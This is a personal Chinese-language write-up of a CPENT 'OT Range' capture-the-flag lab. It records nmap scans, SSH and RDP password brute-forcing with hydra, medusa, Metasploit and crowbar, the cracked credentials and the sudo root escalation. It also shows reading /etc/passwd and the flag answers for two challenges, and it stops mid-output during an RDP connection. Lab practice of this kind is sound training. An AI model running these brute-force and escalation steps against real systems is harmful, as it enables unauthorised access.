OT Range 20230319
題目:
題目:
題目:
題目:
題目:
首先從CTF部分開始。先打110.230:
┌──(root㉿kali)-[~]
└─# nmap -p- 172.16.110.230
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-03 21:38 EDT
Nmap scan report for 172.16.110.230
Host is up (0.037s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 35.63 seconds
┌──(root㉿kali)-[~]
└─# nmap -p22,80,443 -sC -sV -O -A 172.16.110.230
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-03 21:40 EDT
Nmap scan report for 172.16.110.230
Host is up (0.49s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6e6ba176158bd429069bd370c599c6b1 (RSA)
| 256 d250a7902067877baf9f6ca3a949d537 (ECDSA)
|_ 256 b7ee598a140ff88df71e1d6c6b975ec9 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Unix) OpenSSL/1.1.1m PHP/8.0.14 mod_perl/2.0.11 Perl/v5.32.1)
|_http-server-header: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.0.14 mod_perl/2.0.11 Perl/v5.32.1
| http-title: Welcome to XAMPP
|_Requested resource was http://172.16.110.230/dashboard/
443/tcp open ssl/http Apache httpd 2.4.52 ((Unix) OpenSSL/1.1.1m PHP/8.0.14 mod_perl/2.0.11 Perl/v5.32.1)
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.0.14 mod_perl/2.0.11 Perl/v5.32.1
| ssl-cert: Subject: commonName=localhost/organizationName=Apache Friends/stateOrProvinceName=Berlin/countryName=DE
| Not valid before: 2004-10-01T09:10:30
|_Not valid after: 2010-09-30T09:10:30
| http-title: Welcome to XAMPP
|_Requested resource was https://172.16.110.230/dashboard/
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: VoIP adapter|general purpose
Running: Cisco embedded, Linux 2.6.X
OS CPE: cpe:/h:cisco:unified_call_manager cpe:/o:linux:linux_kernel:2.6.26
OS details: Cisco Unified Communications Manager VoIP adapter, Linux 2.6.26 (PCLinuxOS)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 ... 30
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.36 seconds
看完掃描結果,知道110.230有開22 port,先爆破看看:
┌──(root㉿kali)-[~]
└─# hydra -L /home/kali/LPT_day3/Usernames-CPENT.txt -P /home/kali/LPT_day3/Passwords-CPENT.txt ssh://172.16.110.230
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-03 22:13:49
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1820 login tries (l:35/p:52), ~114 tries per task
[DATA] attacking ssh://172.16.110.230:22/
[ERROR] could not connect to ssh://172.16.110.230:22 - ssh_set_client_kex: Out of memory
┌──(root㉿kali)-[~]
└─# cd .ssh
┌──(root㉿kali)-[~/.ssh]
└─# ls
config known_hosts known_hosts.old
┌──(root㉿kali)-[~/.ssh]
└─# vim config
但好像失敗,所以調一下設定:
┌──(root㉿kali)-[~/.ssh]
└─# ssh aaa@172.16.110.230
/root/.ssh/config line 4: Bad key types 'ED25519,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256'.
/root/.ssh/config: terminating, 1 bad configuration options
開啟config後增加下列:
重新開始爆還是失敗:
┌──(root㉿kali)-[~]
└─# hydra -L /home/kali/LPT_day3/Usernames-CPENT.txt -P /home/kali/LPT_day3/Passwords-CPENT.txt ssh://172.16.110.230
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-03 22:21:03
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1820 login tries (l:35/p:52), ~114 tries per task
[DATA] attacking ssh://172.16.110.230:22/
[ERROR] could not connect to ssh://172.16.110.230:22 - kex error : no match for method kex algos: server [curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256], client [diffie-hellman-group1-sha1,diffie-hellman-group14-sha1]
google "ruby ssh algorithm"
看一下:
找找看本機檔案,並編輯:
┌──(root㉿kali)-[~/.ssh]
└─# find / -name algorithms.rb
find: ‘/run/user/116/gvfs’: Permission denied
find: ‘/run/user/1000/doc’: Permission denied
find: ‘/run/user/1000/gvfs’: Permission denied
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/net-ssh-7.0.1/lib/net/ssh/transport/algorithms.rb
┌──(root㉿kali)-[~/.ssh]
└─# vim /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/net-ssh-7.0.1/lib/net/ssh/transport/algorithms.rb
更改下圖紅圈處:
更改如下:
但以上修改也不知道成不成功,懶得用hydra,直接用msf的ssh_login來猜密碼:
msf6 > search ssh_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ssh/ssh_login normal No SSH Login Check Scanner
1 auxiliary/scanner/ssh/ssh_login_pubkey normal No SSH Public Key Login Scanner
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_login_pubkey
msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_login) > set user_file /home/kali/LPT_day3/Usernames-CPENT.txt
user_file => /home/kali/LPT_day3/Usernames-CPENT.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file /home/kali/LPT_day3/Passwords-CPENT.txt
pass_file => /home/kali/LPT_day3/Passwords-CPENT.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 172.16.110.230
rhosts => 172.16.110.230
msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 172.16.110.230:22 - Starting bruteforce
[-] Auxiliary failed: NoMethodError undefined method `new' for nil:NilClass
[-] Call stack:
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/net-ssh-7.0.1/lib/net/ssh/transport/algorithms.rb:443:in `exchange_keys'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/net-ssh-7.0.1/lib/net/ssh/transport/algorithms.rb:251:in `proceed!'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/net-ssh-7.0.1/lib/net/ssh/transport/algorithms.rb:190:in `accept_kexinit'
[-] /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/net-ssh-7.0.1/lib/net/ssh/transport/session.rb:210:in `block in poll_message'
還是噴錯惹
繼續噴錯QQ
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 172.16.110.230
rhosts => 172.16.110.230
msf6 auxiliary(scanner/ssh/ssh_login) > set user_file /home/kali/Usernames-CPENT.txt
user_file => /home/kali/Usernames-CPENT.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file /home/kali/Pa
pass_file => /home/kali/Pa
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file /home/kali/Passwords-CPENT.txt
pass_file => /home/kali/Passwords-CPENT.txt
msf6 auxiliary(scanner/ssh/ssh_login) > run
把.ssh底下的config剛剛有關172.16.110.230相關的設定改回來好了,最後還是用medusa爆破成功: (注意也是在虛擬機上,沒透過moba)
┌──(root㉿kali)-[~]
└─# medusa -h 172.16.170.90 -U /home/kali/LPT_day3/Usernames-CPENT.txt -P /home/kali/LPT_day3/Passwords-CPENT.txt -M smbnt
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [smbnt] Host: 172.16.170.90 (1 of 1, 0 complete) User: administrator (1 of 34, 0 complete) Password: 123456 (1 of 51 complete)
ACCOUNT CHECK: [smbnt] Host: 172.16.170.90 (1 of 1, 0 complete) User: administrator (1 of 34, 0 complete) Password: password (2 of 51 complete)
ACCOUNT CHECK: [smbnt] Host: 172.16.170.90 (1 of 1, 0 complete) User: administrator (1 of 34, 0 complete) Password: 12345678 (3 of 51 complete)
ACCOUNT CHECK: [smbnt] Host: 172.16.170.90 (1 of 1, 0 complete) User: administrator (1 of 34, 0 complete) Password: diamond (4 of 51 complete)
...
ACCOUNT CHECK: [ssh] Host: 172.16.110.230 (1 of 1, 0 complete) User: kevin (5 of 34, 4 complete) Password: Pa$$w0rd (28 of 51 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.110.230 (1 of 1, 0 complete) User: kevin (5 of 34, 4 complete) Password: Pa$$w0rd123 (29 of 51 complete)
ACCOUNT FOUND: [ssh] Host: 172.16.110.230 User: kevin Password: Pa$$w0rd123 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 172.16.110.230 (1 of 1, 0 complete) User: vagrant (6 of 34, 5 complete) Password: 123456 (1 of 51 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.110.230 (1 of 1, 0 complete) User: vagrant (6 of 34, 5 complete) Password: password (2 of 51 complete)
...
ACCOUNT CHECK: [ssh] Host: 172.16.110.230 (1 of 1, 0 complete) User: cpent (28 of 34, 27 complete) Password: Pa$$w0rd123 (29 of 51 complete)
ACCOUNT FOUND: [ssh] Host: 172.16.110.230 User: cpent Password: Pa$$w0rd123 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 172.16.110.230 (1 of 1, 0 complete) User: admin (29 of 34, 28 complete) Password: 123456 (1 of 51 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.110.230 (1 of 1, 0 complete) User: admin (29 of 34, 28 complete) Password: password (2 of 51 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.110.230 (1 of 1, 0 complete) User: admin (29 of 34, 28 complete) Password: 12345678 (3 of 51 complete)
...
帳密是cpent/Pa$$w0rd123 :
┌──(root㉿kali)-[~/.ssh]
└─# ssh cpent@172.16.110.230
cpent@172.16.110.230's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue 04 Apr 2023 05:19:19 AM UTC
System load: 0.0 Processes: 154
Usage of /: 12.0% of 61.51GB Users logged in: 1
Memory usage: 22% IPv4 address for eth0: 172.16.110.230
Swap usage: 0%
43 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Sun Mar 19 04:04:45 2023 from 172.16.253.15
cpent@BWA-OT:~$
翻出密碼檔:
cpent@BWA-OT:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
jason:x:1000:1000:jason:/home/jason:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
kevin:x:1001:1001:,,,:/home/kevin:/bin/bash
mysql:x:997:1002::/home/mysql:/bin/sh
cpent:x:1002:1003:,,,:/home/cpent:/bin/bash
可知還有kevin,以下不是在自己電腦的虛擬機上做。
┌──(root💀kali)-[~]
└─# hydra -l kevin -P /home/kali/Passwords-CPENT.txt ssh://172.16.110.230
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-04 01:26:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 52 login tries (l:1/p:52), ~4 tries per task
[DATA] attacking ssh://172.16.110.230:22/
[22][ssh] host: 172.16.110.230 login: kevin password: Pa$$w0rd123
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-04 01:26:36
不過後來用自己的ssh_login測試:
msf6 auxiliary(scanner/ssh/ssh_enumusers) > use scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all
users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from
0 to 5
DB_ALL_CREDS false no Try each user/password coupl
e stored in the current data
base
DB_ALL_PASS false no Add all passwords in the cur
rent database to the list
DB_ALL_USERS false no Add all users in the current
database to the list
DB_SKIP_EXISTING none no Skip existing credentials st
ored in the current database
(Accepted: none, user, user
&realm)
PASSWORD no A specific password to authe
nticate with
PASS_FILE /home/kali/LPT_da no File containing passwords, o
y3/Passwords-CPEN ne per line
T.txt
RHOSTS 172.16.110.230 yes The target host(s), see http
s://docs.metasploit.com/docs
/using-metasploit/basics/usi
ng-metasploit.html
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credent
ial works for a host
THREADS 1 yes The number of concurrent thr
eads (max one per host)
USERNAME no A specific username to authe
nticate as
USERPASS_FILE no File containing users and pa
sswords separated by space,
one pair per line
USER_AS_PASS false no Try the username as the pass
word for all users
USER_FILE /home/kali/LPT_da no File containing usernames, o
y3/Usernames-CPEN ne per line
T.txt
VERBOSE false yes Whether to print output for
all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 172.16.110.230:22 - Starting bruteforce
[+] 172.16.110.230:22 - Success: 'kevin:Pa$$w0rd123' 'uid=1001(kevin) gid=1001(kevin) groups=1001(kevin),27(sudo) Linux BWA-OT.CPENT.LOCALNET 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux '
[*] SSH session 1 opened (192.168.200.4:40413 -> 172.16.110.230:22) at 2023-04-09 02:06:08 -0400
ssh_login直接爆破得到kevin,沒爆破到cpent,所以下面直接登入:
┌──(root㉿kali)-[~/.ssh]
└─# ssh kevin@172.16.110.230
kevin@172.16.110.230's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue 04 Apr 2023 05:29:03 AM UTC
System load: 0.03 Processes: 154
Usage of /: 12.0% of 61.51GB Users logged in: 1
Memory usage: 22% IPv4 address for eth0: 172.16.110.230
Swap usage: 0%
43 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Mar 19 04:07:01 2023 from 172.16.253.15
kevin@BWA-OT:~$ pwd
/home/kevin
可以用linpeas,也可以用以下指令:
kevin@BWA-OT:~$ id
uid=1001(kevin) gid=1001(kevin) groups=1001(kevin),27(sudo)
kevin@BWA-OT:~$ sudo -l
sudo: unable to resolve host BWA-OT.CPENT.LOCALNET: Temporary failure in name resolution
[sudo] password for kevin:
Sorry, try again.
[sudo] password for kevin:
Matching Defaults entries for kevin on BWA-OT:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User kevin may run the following commands on BWA-OT:
(ALL : ALL) ALL
(ALL : ALL) ALL
看到(ALL : ALL) ALL就是可以執行任何指令,因此sudo -i直接提權。
kevin@BWA-OT:~$ sudo -i
sudo: unable to resolve host BWA-OT.CPENT.LOCALNET: Temporary failure in name resolution
[sudo] password for kevin:
root@BWA-OT:~# find / -name rootflag.txt -print 2>/dev/null
/root/rootflag.txt
root@BWA-OT:~# cat /root/rootflag.txt
OTRoot-8125
root@BWA-OT:~# md5sum /root/rootflag.txt
24f87e1c12f8ecf4c6eacbf934377ee5 /root/rootflag.txt
Challenge 38: (60 Points)
Escalate your privilege to that of a Root user in the 192.168.110.230 machine, locate rootflag.txt and submit the last 6 hex digits of the md5 hash the file.
Ans: 377ee5
root@BWA-OT:~# cd /home
root@BWA-OT:/home# ls
cpent jason kevin
root@BWA-OT:/home# cd kevin/
root@BWA-OT:/home/kevin# ls
snap userflag.txt
root@BWA-OT:/home/kevin# cat userflag.txt
OTUser-5123
root@BWA-OT:/home/kevin# md5sum userflag.txt
c1dc90228bcce6ab598e070e8aa390d2 userflag.txt
Challenge 37: (40 Points)
Compromise the 192.168.110.230 machine to gain user-level access. Locate userflag.txt and submit the last 6 hex digits of the md5 hash of the file.
Ans: A390D2
接下來打110.105:
┌──(root㉿kali)-[~]
└─# nmap -p- 172.16.110.105
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-03 23:38 EDT
Nmap scan report for 172.16.110.105
Host is up (0.036s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 368.38 seconds
┌──(root㉿kali)-[~]
└─# nmap -p135,139,445,3389,5985,47001,49664-49670 -sC -sV -O -A 172.16.110.105
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-03 23:46 EDT
Nmap scan report for 172.16.110.105
Host is up (0.036s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-HPDDJG3FLDO
| Not valid before: 2023-03-18T02:58:49
|_Not valid after: 2023-09-17T02:58:49
|_ssl-date: 2023-04-04T03:48:37+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|phone
Running: Linux 2.4.X|2.6.X, Sony Ericsson embedded
OS CPE: cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:sonyericsson:u8i_vivaz
OS details: Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22), Sony Ericsson U8i Vivaz mobile phone
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 ... 30
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.96 seconds
hydra爆破,rdp (port 3389)會比ssh (port 22)來的快,因為thread數較多。以下是在遠端主機,自己的虛擬機會噴錯,需處理。
┌──(root💀kali)-[~]
└─# hydra -L /home/kali/Usernames-CPENT.txt -P /home/kali/Passwords-CPENT.txt rdp://172.16.110.105 -t 4
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-04 00:05:03
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1820 login tries (l:35/p:52), ~455 tries per task
[DATA] attacking rdp://172.16.110.105:3389/
[3389][rdp] host: 172.16.110.105 login: kevin password: Pa$$w0rd123
[ERROR] freerdp: The connection failed to establish.
[STATUS] 508.00 tries/min, 508 tries in 00:01h, 1318 to do in 00:03h, 4 active
[STATUS] 469.00 tries/min, 1407 tries in 00:03h, 422 to do in 00:01h, 4 active
[3389][rdp] host: 172.16.110.105 login: cpent password: Pa$$w0rd123
[ERROR] freerdp: The connection failed to establish.
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-04 00:09:00
後來使用自己虛擬機的crowbar來爆破終於成功,而且要記得--要在虛擬機的cmd上爆破,不要透過mobaxterm。
┌──(root㉿kali)-[~]
└─# crowbar -b rdp -s 172.16.110.105/32 -U /home/kali/LPT_day3/Usernames-CPENT.txt -C /home/kali/LPT_day3/Passwords-CPENT.txt -v
2023-05-01 22:40:13 START
2023-05-01 22:40:13 Crowbar v0.4.2
2023-05-01 22:40:13 Brute Force Type: rdp
2023-05-01 22:40:13 Output File: /root/crowbar.out
2023-05-01 22:40:13 Log File: /root/crowbar.log
2023-05-01 22:40:13 Discover Mode: False
2023-05-01 22:40:13 Verbose Mode: 1
2023-05-01 22:40:13 Debug Mode: False
2023-05-01 22:40:13 Trying 172.16.110.105:3389
2023-05-01 22:40:13 LOG-RDP: 172.16.110.105:3389 - administrator:123456
2023-05-01 22:40:13 LOG-RDP: 172.16.110.105:3389 - administrator:password
2023-05-01 22:40:13 LOG-RDP: 172.16.110.105:3389 - administrator:12345678
...so many
2023-05-01 22:40:59 LOG-RDP: 172.16.110.105:3389 - kevin:test123456
2023-05-01 22:40:59 LOG-RDP: 172.16.110.105:3389 - kevin:victor
2023-05-01 22:40:59 LOG-RDP: 172.16.110.105:3389 - kevin:puppettwo
2023-05-01 22:40:59 LOG-RDP: 172.16.110.105:3389 - kevin:studentpw
2023-05-01 22:40:59 RDP-SUCCESS : 172.16.110.105:3389 - kevin:Pa$$w0rd123
2023-05-01 22:40:59 LOG-RDP: 172.16.110.105:3389 - kevin:cpent123
2023-05-01 22:41:00 LOG-RDP: 172.16.110.105:3389 - kevin:cpent@123
2023-05-01 22:41:00 LOG-RDP: 172.16.110.105:3389 - kevin:cpent123456
2023-05-01 22:41:00 LOG-RDP: 172.16.110.105:3389 - kevin:cpentpw
...so many
2023-05-01 22:44:40 LOG-RDP: 172.16.110.105:3389 - cpent:victor
2023-05-01 22:44:40 LOG-RDP: 172.16.110.105:3389 - cpent:puppettwo
2023-05-01 22:44:40 RDP-SUCCESS : 172.16.110.105:3389 - cpent:Pa$$w0rd123
2023-05-01 22:44:40 LOG-RDP: 172.16.110.105:3389 - cpent:studentpw
2023-05-01 22:44:40 LOG-RDP: 172.16.110.105:3389 - cpent:cpent123
2023-05-01 22:45:50 LOG-RDP: 172.16.110.105:3389 - :eccpw
2023-05-01 22:45:50 LOG-RDP: 172.16.110.105:3389 - :
2023-05-01 22:45:51 STOP
用爆破出的密碼來登入:
┌──(kali㉿kali)-[~]
└─$ rdesktop 172.16.110.105 -g 90%
Autoselecting keyboard map 'en-us' from locale
ATTENTION! The server uses and invalid security certificate which can not be trusted for
the following identified reasons(s);
1. Certificate issuer is not trusted by this system.
Issuer: CN=WIN-HPDDJG3FLDO
Review the following certificate info before you trust it to be added as an exception.
If you do not trust the certificate the connection atempt will be aborted:
Subject: CN=WIN-HPDDJG3FLDO
Issuer: CN=WIN-HPDDJG3FLDO
Valid From: Fri Mar 17 22:58:49 2023
To: Sat Sep 16 22:58:49 2023
Certificate fingerprints:
sha1: 317bdff0b74fc4a7fb1b8051c444b241e3b48f03
sha256: bb156d9fbf2ba5b97d021989ae6d280634307233b091e6c0f0f79b6aa384a04a
Do you trust this certificate (yes/no)? yes
Failed to initialize NLA, do you have correct Kerberos TGT initialized ?
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Connection established using SSL.
Protocol(warning): process_pdu_logon(), Unhandled login infotype 1
使用xfreerdp。
Linux远程图形化界面出错:MoTTY X11 proxy: Unsupported authorisation protocol - 时间的风景 - 博客园
x11 forwarding - How to fix "MobaXterm X11 proxy: Unsupported authorisation protocol" - Super User
┌──(root㉿kali)-[~]
└─# xfreerdp -h
MoTTY X11 proxy: Unsupported authorisation protocol
[02:26:05:255] [114263:114263] [ERROR][com.freerdp.client.x11] - failed to open display: localhost:11.0
[02:26:05:256] [114263:114263] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.
┌──(root㉿kali)-[~]
└─# cp /home/kali/.Xauthority /root/
┌──(root㉿kali)-[/home/kali]
└─# mcookie
4abf4616d6350ce0ae35c50759bdc92f
┌──(root㉿kali)-[~]
└─# cp /home/kali/.Xauthority /root/
┌──(root㉿kali)-[~]
└─# xfreerdp -v:172.16.110.105 -u:cpent
[03:27:49:891] [145868:145885] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[03:27:49:892] [145868:145885] [WARN][com.freerdp.crypto] - CN = WIN-HPDDJG3FLDO
[03:27:49:894] [145868:145885] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[03:27:49:895] [145868:145885] [ERROR][com.freerdp.crypto] - @ WARNING: CERTIFICATE NAME MISMATCH! @
[03:27:49:896] [145868:145885] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[03:27:49:896] [145868:145885] [ERROR][com.freerdp.crypto] - The hostname used for this connection (172.16.110.105:3389)
[03:27:49:896] [145868:145885] [ERROR][com.freerdp.crypto] - does not match the name given in the certificate:
[03:27:49:896] [145868:145885] [ERROR][com.freerdp.crypto] - Common Name (CN):
[03:27:49:896] [145868:145885] [ERROR][com.freerdp.crypto] - WIN-HPDDJG3FLDO
[03:27:49:896] [145868:145885] [ERROR][com.freerdp.crypto] - A valid certificate for the wrong name should NOT be trusted!
Certificate details for 172.16.110.105:3389 (RDP-Server):
Common Name: WIN-HPDDJG3FLDO
Subject: CN = WIN-HPDDJG3FLDO
Issuer: CN = WIN-HPDDJG3FLDO
Thumbprint: bb:15:6d:9f:bf:2b:a5:b9:7d:02:19:89:ae:6d:28:06:34:30:72:33:b0:91:e6:c0:f0:f7:9b:6a:a3:84:a0:4a
The above X.509 certificate could not be verified, possibly because you do not have
